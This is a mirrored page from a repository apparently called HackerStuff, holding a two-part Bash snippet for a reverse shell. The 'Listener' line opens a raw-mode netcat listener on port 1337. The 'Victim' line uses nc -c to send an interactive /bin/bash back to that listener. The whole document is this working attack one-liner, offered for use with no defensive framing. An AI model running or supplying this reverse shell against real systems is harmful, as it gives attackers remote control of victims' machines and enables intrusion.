mirror of
https://github.com/0xdade/HackerStuff.git
synced 2025-10-29 16:59:27 +00:00
6 lines
115 B
Bash
6 lines
115 B
Bash
# Listener
|
|
stty -echo raw ; nc -lp 1337; stty sane
|
|
|
|
# Victim
|
|
nc -c '/bin/bash -c "script /dev/null"' listener 1337
|